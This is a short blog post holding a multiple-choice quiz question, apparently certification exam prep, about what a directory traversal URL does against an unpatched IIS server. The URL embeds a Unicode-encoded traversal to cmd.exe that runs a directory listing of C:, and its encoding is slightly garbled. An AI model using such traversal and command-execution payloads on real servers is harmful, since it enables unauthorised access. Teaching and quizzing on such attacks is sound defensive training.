• Post author:
  • Post category:Blog
  • Reading time:1 mins read
  • Post last modified:March 16, 2024

What will the following URL produce in an unpatched IIS Web Server?

http://www.thetargetsite.com/scripts/..% co%af../..%co%af../windows/system32/cmd.exe?/c+dir+c:\

  • Directory listing of C: drive on the web server
  • Insert a Trojan horse into the C: drive of the web server
  • Execute a buffer flow in the C: drive of the web server
  • Directory listing of the C:\windows\system32 folder on the web server